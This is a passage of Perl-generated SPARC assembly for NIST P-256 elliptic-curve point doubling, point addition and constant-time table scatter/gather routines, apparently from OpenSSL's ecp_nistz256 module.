addccc @acc[5],0,@acc[5]
addccc @acc[6],$bi,@acc[6]
addccc @acc[7],$carry,@acc[7]
addc %g0,%g0,$carry
! ret >>= 1
srl @acc[0],1,@acc[0]
sll @acc[1],31,$t0
srl @acc[1],1,@acc[1]
or @acc[0],$t0,@acc[0]
sll @acc[2],31,$t1
srl @acc[2],1,@acc[2]
or @acc[1],$t1,@acc[1]
sll @acc[3],31,$t2
st @acc[0],[$rp]
srl @acc[3],1,@acc[3]
or @acc[2],$t2,@acc[2]
sll @acc[4],31,$t3
st @acc[1],[$rp+4]
srl @acc[4],1,@acc[4]
or @acc[3],$t3,@acc[3]
sll @acc[5],31,$t4
st @acc[2],[$rp+8]
srl @acc[5],1,@acc[5]
or @acc[4],$t4,@acc[4]
sll @acc[6],31,$t5
st @acc[3],[$rp+12]
srl @acc[6],1,@acc[6]
or @acc[5],$t5,@acc[5]
sll @acc[7],31,$t6
st @acc[4],[$rp+16]
srl @acc[7],1,@acc[7]
or @acc[6],$t6,@acc[6]
sll $carry,31,$t7
st @acc[5],[$rp+20]
or @acc[7],$t7,@acc[7]
st @acc[6],[$rp+24]
retl
st @acc[7],[$rp+28]
.size __ecp_nistz256_div_by_2,.-__ecp_nistz256_div_by_2
___
########################################################################
# following subroutines are "literal" implementation of those found in
# ecp_nistz256.c
#
########################################################################
# void ecp_nistz256_point_double(P256_POINT *out,const P256_POINT *inp);
#
{
my ($S,$M,$Zsqr,$tmp0)=map(32*$_,(0..3));
# above map() describes stack layout with 4 temporary
# 256-bit vectors on top.
$code.=<<___;
#ifdef __PIC__
SPARC_PIC_THUNK(%g1)
#endif
.globl ecp_nistz256_point_double
.align 32
ecp_nistz256_point_double:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_double_vis3
nop
save %sp,-STACK_FRAME-32*4,%sp
mov $rp,$rp_real
mov $ap,$ap_real
.Lpoint_double_shortcut:
ld [$ap+32],@acc[0]
ld [$ap+32+4],@acc[1]
ld [$ap+32+8],@acc[2]
ld [$ap+32+12],@acc[3]
ld [$ap+32+16],@acc[4]
ld [$ap+32+20],@acc[5]
ld [$ap+32+24],@acc[6]
ld [$ap+32+28],@acc[7]
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(S, in_y);
add %sp,LOCALS+$S,$rp
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Zsqr, in_z);
add %sp,LOCALS+$Zsqr,$rp
add $ap_real,0,$bp
call __ecp_nistz256_add ! p256_add(M, Zsqr, in_x);
add %sp,LOCALS+$M,$rp
add %sp,LOCALS+$S,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(S, S);
add %sp,LOCALS+$S,$rp
ld [$ap_real],@acc[0]
add %sp,LOCALS+$Zsqr,$bp
ld [$ap_real+4],@acc[1]
ld [$ap_real+8],@acc[2]
ld [$ap_real+12],@acc[3]
ld [$ap_real+16],@acc[4]
ld [$ap_real+20],@acc[5]
ld [$ap_real+24],@acc[6]
ld [$ap_real+28],@acc[7]
call __ecp_nistz256_sub_from ! p256_sub(Zsqr, in_x, Zsqr);
add %sp,LOCALS+$Zsqr,$rp
add $ap_real,32,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(tmp0, in_z, in_y);
add %sp,LOCALS+$tmp0,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(res_z, tmp0);
add $rp_real,64,$rp
add %sp,LOCALS+$Zsqr,$bp
add %sp,LOCALS+$M,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(M, M, Zsqr);
add %sp,LOCALS+$M,$rp
call __ecp_nistz256_mul_by_3 ! p256_mul_by_3(M, M);
add %sp,LOCALS+$M,$rp
add %sp,LOCALS+$S,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(tmp0, S);
add %sp,LOCALS+$tmp0,$rp
call __ecp_nistz256_div_by_2 ! p256_div_by_2(res_y, tmp0);
add $rp_real,32,$rp
add $ap_real,0,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S, S, in_x);
add %sp,LOCALS+$S,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(tmp0, S);
add %sp,LOCALS+$tmp0,$rp
add %sp,LOCALS+$M,$bp
add %sp,LOCALS+$M,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(res_x, M);
add $rp_real,0,$rp
add %sp,LOCALS+$tmp0,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, tmp0);
add $rp_real,0,$rp
add %sp,LOCALS+$S,$bp
call __ecp_nistz256_sub_morf ! p256_sub(S, S, res_x);
add %sp,LOCALS+$S,$rp
add %sp,LOCALS+$M,$bp
add %sp,LOCALS+$S,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S, S, M);
add %sp,LOCALS+$S,$rp
add $rp_real,32,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, S, res_y);
add $rp_real,32,$rp
ret
restore
.size ecp_nistz256_point_double,.-ecp_nistz256_point_double
___
}
########################################################################
# void ecp_nistz256_point_add(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT *in2);
{
my ($res_x,$res_y,$res_z,
$H,$Hsqr,$R,$Rsqr,$Hcub,
$U1,$U2,$S1,$S2)=map(32*$_,(0..11));
my ($Z1sqr, $Z2sqr) = ($Hsqr, $Rsqr);
# above map() describes stack layout with 12 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty, result of check for zero and return pointer.
my $bp_real=$rp_real;
$code.=<<___;
.globl ecp_nistz256_point_add
.align 32
ecp_nistz256_point_add:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_add_vis3
nop
save %sp,-STACK_FRAME-32*12-32,%sp
stx $rp,[%fp+STACK_BIAS-8] ! off-load $rp
mov $ap,$ap_real
mov $bp,$bp_real
ld [$bp],@acc[0] ! in2_x
ld [$bp+4],@acc[1]
ld [$bp+8],@acc[2]
ld [$bp+12],@acc[3]
ld [$bp+16],@acc[4]
ld [$bp+20],@acc[5]
ld [$bp+24],@acc[6]
ld [$bp+28],@acc[7]
ld [$bp+32],$t0 ! in2_y
ld [$bp+32+4],$t1
ld [$bp+32+8],$t2
ld [$bp+32+12],$t3
ld [$bp+32+16],$t4
ld [$bp+32+20],$t5
ld [$bp+32+24],$t6
ld [$bp+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in2infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-12]
ld [$ap],@acc[0] ! in1_x
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
ld [$ap+28],@acc[7]
ld [$ap+32],$t0 ! in1_y
ld [$ap+32+4],$t1
ld [$ap+32+8],$t2
ld [$ap+32+12],$t3
ld [$ap+32+16],$t4
ld [$ap+32+20],$t5
ld [$ap+32+24],$t6
ld [$ap+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in1infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-16]
add $bp_real,64,$bp
add $bp_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z2sqr, in2_z);
add %sp,LOCALS+$Z2sqr,$rp
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS+$Z1sqr,$rp
add $bp_real,64,$bp
add %sp,LOCALS+$Z2sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S1, Z2sqr, in2_z);
add %sp,LOCALS+$S1,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS+$S2,$rp
add $ap_real,32,$bp
add %sp,LOCALS+$S1,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S1, S1, in1_y);
add %sp,LOCALS+$S1,$rp
add $bp_real,32,$bp
add %sp,LOCALS+$S2,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$S1,$bp
call __ecp_nistz256_sub_from ! p256_sub(R, S2, S1);
add %sp,LOCALS+$R,$rp
or @acc[1],@acc[0],@acc[0] ! see if result is zero
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
st @acc[0],[%fp+STACK_BIAS-20]
add $ap_real,0,$bp
add %sp,LOCALS+$Z2sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U1, in1_x, Z2sqr);
add %sp,LOCALS+$U1,$rp
add $bp_real,0,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, in2_x, Z1sqr);
add %sp,LOCALS+$U2,$rp
add %sp,LOCALS+$U1,$bp
call __ecp_nistz256_sub_from ! p256_sub(H, U2, U1);
add %sp,LOCALS+$H,$rp
or @acc[1],@acc[0],@acc[0] ! see if result is zero
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
orcc @acc[4],@acc[0],@acc[0]
bne,pt %icc,.Ladd_proceed ! is_equal(U1,U2)?
nop
ld [%fp+STACK_BIAS-12],$t0
ld [%fp+STACK_BIAS-16],$t1
ld [%fp+STACK_BIAS-20],$t2
andcc $t0,$t1,%g0
be,pt %icc,.Ladd_proceed ! (in1infty || in2infty)?
nop
andcc $t2,$t2,%g0
be,pt %icc,.Ladd_double ! is_equal(S1,S2)?
nop
ldx [%fp+STACK_BIAS-8],$rp
st %g0,[$rp]
st %g0,[$rp+4]
st %g0,[$rp+8]
st %g0,[$rp+12]
st %g0,[$rp+16]
st %g0,[$rp+20]
st %g0,[$rp+24]
st %g0,[$rp+28]
st %g0,[$rp+32]
st %g0,[$rp+32+4]
st %g0,[$rp+32+8]
st %g0,[$rp+32+12]
st %g0,[$rp+32+16]
st %g0,[$rp+32+20]
st %g0,[$rp+32+24]
st %g0,[$rp+32+28]
st %g0,[$rp+64]
st %g0,[$rp+64+4]
st %g0,[$rp+64+8]
st %g0,[$rp+64+12]
st %g0,[$rp+64+16]
st %g0,[$rp+64+20]
st %g0,[$rp+64+24]
st %g0,[$rp+64+28]
b .Ladd_done
nop
.align 16
.Ladd_double:
ldx [%fp+STACK_BIAS-8],$rp_real
mov $ap_real,$ap
b .Lpoint_double_shortcut
add %sp,32*(12-4)+32,%sp ! difference in frame sizes
.align 16
.Ladd_proceed:
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$R,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS+$Rsqr,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS+$res_z,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS+$Hsqr,$rp
add $bp_real,64,$bp
add %sp,LOCALS+$res_z,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, res_z, in2_z);
add %sp,LOCALS+$res_z,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS+$Hcub,$rp
add %sp,LOCALS+$U1,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, U1, Hsqr);
add %sp,LOCALS+$U2,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$Rsqr,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$Hcub,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$U2,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$Hcub,$bp
add %sp,LOCALS+$S1,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S1, Hcub);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$res_y,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$S2,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS+$res_y,$rp
ld [%fp+STACK_BIAS-16],$t1 ! !in1infty
ld [%fp+STACK_BIAS-12],$t2 ! !in2infty
ldx [%fp+STACK_BIAS-8],$rp
___
for($i=0;$i<96;$i+=8) { # conditional moves
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$bp_real+$i],@acc[2] ! in2
ld [$bp_real+$i+4],@acc[3]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@acc[2],@acc[0]
movrz $t1,@acc[3],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
$code.=<<___;
.Ladd_done:
ret
restore
.size ecp_nistz256_point_add,.-ecp_nistz256_point_add
___
}
########################################################################
# void ecp_nistz256_point_add_affine(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT_AFFINE *in2);
{
my ($res_x,$res_y,$res_z,
$U2,$S2,$H,$R,$Hsqr,$Hcub,$Rsqr)=map(32*$_,(0..9));
my $Z1sqr = $S2;
# above map() describes stack layout with 10 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty, !in2infty, result of check for zero and return pointer.
my @ONE_mont=(1,0,0,-1,-1,-1,-2,0);
my $bp_real=$rp_real;
$code.=<<___;
.globl ecp_nistz256_point_add_affine
.align 32
ecp_nistz256_point_add_affine:
SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
ld [%g1],%g1 ! OPENSSL_sparcv9cap_P[0]
and %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK),%g1
cmp %g1,(SPARCV9_VIS3|SPARCV9_64BIT_STACK)
be ecp_nistz256_point_add_affine_vis3
nop
save %sp,-STACK_FRAME-32*10-32,%sp
stx $rp,[%fp+STACK_BIAS-8] ! off-load $rp
mov $ap,$ap_real
mov $bp,$bp_real
ld [$ap],@acc[0] ! in1_x
ld [$ap+4],@acc[1]
ld [$ap+8],@acc[2]
ld [$ap+12],@acc[3]
ld [$ap+16],@acc[4]
ld [$ap+20],@acc[5]
ld [$ap+24],@acc[6]
ld [$ap+28],@acc[7]
ld [$ap+32],$t0 ! in1_y
ld [$ap+32+4],$t1
ld [$ap+32+8],$t2
ld [$ap+32+12],$t3
ld [$ap+32+16],$t4
ld [$ap+32+20],$t5
ld [$ap+32+24],$t6
ld [$ap+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in1infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-16]
ld [$bp],@acc[0] ! in2_x
ld [$bp+4],@acc[1]
ld [$bp+8],@acc[2]
ld [$bp+12],@acc[3]
ld [$bp+16],@acc[4]
ld [$bp+20],@acc[5]
ld [$bp+24],@acc[6]
ld [$bp+28],@acc[7]
ld [$bp+32],$t0 ! in2_y
ld [$bp+32+4],$t1
ld [$bp+32+8],$t2
ld [$bp+32+12],$t3
ld [$bp+32+16],$t4
ld [$bp+32+20],$t5
ld [$bp+32+24],$t6
ld [$bp+32+28],$t7
or @acc[1],@acc[0],@acc[0]
or @acc[3],@acc[2],@acc[2]
or @acc[5],@acc[4],@acc[4]
or @acc[7],@acc[6],@acc[6]
or @acc[2],@acc[0],@acc[0]
or @acc[6],@acc[4],@acc[4]
or @acc[4],@acc[0],@acc[0]
or $t1,$t0,$t0
or $t3,$t2,$t2
or $t5,$t4,$t4
or $t7,$t6,$t6
or $t2,$t0,$t0
or $t6,$t4,$t4
or $t4,$t0,$t0
or @acc[0],$t0,$t0 ! !in2infty
movrnz $t0,-1,$t0
st $t0,[%fp+STACK_BIAS-12]
add $ap_real,64,$bp
add $ap_real,64,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS+$Z1sqr,$rp
add $bp_real,0,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, Z1sqr, in2_x);
add %sp,LOCALS+$U2,$rp
add $ap_real,0,$bp
call __ecp_nistz256_sub_from ! p256_sub(H, U2, in1_x);
add %sp,LOCALS+$H,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$Z1sqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS+$S2,$rp
add $ap_real,64,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS+$res_z,$rp
add $bp_real,32,$bp
add %sp,LOCALS+$S2,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS+$S2,$rp
add $ap_real,32,$bp
call __ecp_nistz256_sub_from ! p256_sub(R, S2, in1_y);
add %sp,LOCALS+$R,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$H,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$R,$ap
call __ecp_nistz256_mul_mont ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS+$Rsqr,$rp
add %sp,LOCALS+$H,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS+$Hcub,$rp
add $ap_real,0,$bp
add %sp,LOCALS+$Hsqr,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(U2, in1_x, Hsqr);
add %sp,LOCALS+$U2,$rp
call __ecp_nistz256_mul_by_2 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS+$Hsqr,$rp
add %sp,LOCALS+$Rsqr,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$Hcub,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS+$res_x,$rp
add %sp,LOCALS+$U2,$bp
call __ecp_nistz256_sub_morf ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS+$res_y,$rp
add $ap_real,32,$bp
add %sp,LOCALS+$Hcub,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(S2, in1_y, Hcub);
add %sp,LOCALS+$S2,$rp
add %sp,LOCALS+$R,$bp
add %sp,LOCALS+$res_y,$ap
call __ecp_nistz256_mul_mont ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS+$res_y,$rp
add %sp,LOCALS+$S2,$bp
call __ecp_nistz256_sub_from ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS+$res_y,$rp
ld [%fp+STACK_BIAS-16],$t1 ! !in1infty
ld [%fp+STACK_BIAS-12],$t2 ! !in2infty
ldx [%fp+STACK_BIAS-8],$rp
___
for($i=0;$i<64;$i+=8) { # conditional moves
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$bp_real+$i],@acc[2] ! in2
ld [$bp_real+$i+4],@acc[3]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@acc[2],@acc[0]
movrz $t1,@acc[3],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
for(;$i<96;$i+=8) {
my $j=($i-64)/4;
$code.=<<___;
ld [%sp+LOCALS+$i],@acc[0] ! res
ld [%sp+LOCALS+$i+4],@acc[1]
ld [$ap_real+$i],@acc[4] ! in1
ld [$ap_real+$i+4],@acc[5]
movrz $t1,@ONE_mont[$j],@acc[0]
movrz $t1,@ONE_mont[$j+1],@acc[1]
movrz $t2,@acc[4],@acc[0]
movrz $t2,@acc[5],@acc[1]
st @acc[0],[$rp+$i]
st @acc[1],[$rp+$i+4]
___
}
$code.=<<___;
ret
restore
.size ecp_nistz256_point_add_affine,.-ecp_nistz256_point_add_affine
___
} }}}
{{{
my ($out,$inp,$index)=map("%i$_",(0..2));
my $mask="%o0";
$code.=<<___;
! void ecp_nistz256_scatter_w5(void *%i0,const P256_POINT *%i1,
! int %i2);
.globl ecp_nistz256_scatter_w5
.align 32
ecp_nistz256_scatter_w5:
save %sp,-STACK_FRAME,%sp
sll $index,2,$index
add $out,$index,$out
ld [$inp],%l0 ! X
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
add $inp,32,$inp
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
add $out,64*8,$out
ld [$inp],%l0 ! Y
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
add $inp,32,$inp
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
add $out,64*8,$out
ld [$inp],%l0 ! Z
ld [$inp+4],%l1
ld [$inp+8],%l2
ld [$inp+12],%l3
ld [$inp+16],%l4
ld [$inp+20],%l5
ld [$inp+24],%l6
ld [$inp+28],%l7
st %l0,[$out+64*0-4]
st %l1,[$out+64*1-4]
st %l2,[$out+64*2-4]
st %l3,[$out+64*3-4]
st %l4,[$out+64*4-4]
st %l5,[$out+64*5-4]
st %l6,[$out+64*6-4]
st %l7,[$out+64*7-4]
ret
restore
.size ecp_nistz256_scatter_w5,.-ecp_nistz256_scatter_w5
! void ecp_nistz256_gather_w5(P256_POINT *%i0,const void *%i1,
! int %i2);
.globl ecp_nistz256_gather_w5
.align 32
ecp_nistz256_gather_w5:
save %sp,-STACK_FRAME,%sp
neg $index,$mask
srax $mask,63,$mask
add $index,$mask,$index
sll $index,2,$index
add $inp,$index,$inp
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
add $inp,64*8,$inp
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! X
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
add $out,32,$out
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
add $inp,64*8,$inp
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! Y
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
add $out,32,$out
ld [$inp+64*0],%l0
ld [$inp+64*1],%l1
ld [$inp+64*2],%l2
ld [$inp+64*3],%l3
ld [$inp+64*4],%l4
ld [$inp+64*5],%l5
ld [$inp+64*6],%l6
ld [$inp+64*7],%l7
and %l0,$mask,%l0
and %l1,$mask,%l1
st %l0,[$out] ! Z
and %l2,$mask,%l2
st %l1,[$out+4]
and %l3,$mask,%l3
st %l2,[$out+8]
and %l4,$mask,%l4
st %l3,[$out+12]
and %l5,$mask,%l5
st %l4,[$out+16]
and %l6,$mask,%l6
st %l5,[$out+20]
and %l7,$mask,%l7
st %l6,[$out+24]
st %l7,[$out+28]
ret
restore
.size ecp_nistz256_gather_w5,.-ecp_nistz256_gather_w5
! void ecp_nistz256_scatter_w7(void *%i0,const P256_POINT_AFFINE *%i1,
! int %i2);
.globl ecp_nistz256_scatter_w7
.align 32
ecp_nistz256_scatter_w7:
save %sp,-STACK_FRAME,%sp
nop
add $out,$index,$out
mov 64/4,$index
.Loop_scatter_w7:
ld [$inp],%l0
add $inp,4,$inp
subcc $index,1,$index
stb %l0,[$out+64*0-1]
srl %l0,8,%l1
stb %l1,[$out+64*1-1]
srl %l0,16,%l2
stb %l2,[$out+64*2-1]
srl %l0,24,%l3
stb %l3,[$out+64*3-1]
bne .Loop_scatter_w7
add $out,64*4,$out
ret
restore
.size ecp_nistz256_scatter_w7,.-ecp_nistz256_scatter_w7
! void ecp_nistz256_gather_w7(P256_POINT_AFFINE *%i0,const void *%i1,
! int %i2);
.globl ecp_nistz256_gather_w7
.align 32
ecp_nistz256_gather_w7:
save %sp,-STACK_FRAME,%sp
neg $index,$mask
srax $mask,63,$mask
add $index,$mask,$index
add $inp,$index,$inp
mov 64/4,$index
.Loop_gather_w7:
ldub [$inp+64*0],%l0
prefetch [$inp+3840+64*0],1
subcc $index,1,$index
ldub [$inp+64*1],%l1
prefetch [$inp+3840+64*1],1
ldub [$inp+64*2],%l2
prefetch [$inp+3840+64*2],1
ldub [$inp+64*3],%l3
prefetch [$inp+3840+64*3],1
add $inp,64*4,$inp
sll %l1,8,%l1
sll %l2,16,%l2
or %l0,%l1,%l0
sll %l3,24,%l3
or %l0,%l2,%l0
or %l0,%l3,%l0
and %l0,$mask,%l0
st %l0,[$out]
bne .Loop_gather_w7
add $out,4,$out
ret
restore
.size ecp_nistz256_gather_w7,.-ecp_nistz256_gather_w7
___
}}}
{{{
########################################################################
# Following subroutines are VIS3 counterparts of those above that
# implement ones found in ecp_nistz256.c. Key difference is that they
# use 128-bit muliplication and addition with 64-bit carry, and in order
# to do that they perform conversion from uin32_t[8] to uint64_t[4] upon
# entry and vice versa on return.
#
my ($rp,$ap,$bp)=map("%i$_",(0..2));
my ($t0,$t1,$t2,$t3,$a0,$a1,$a2,$a3)=map("%l$_",(0..7));
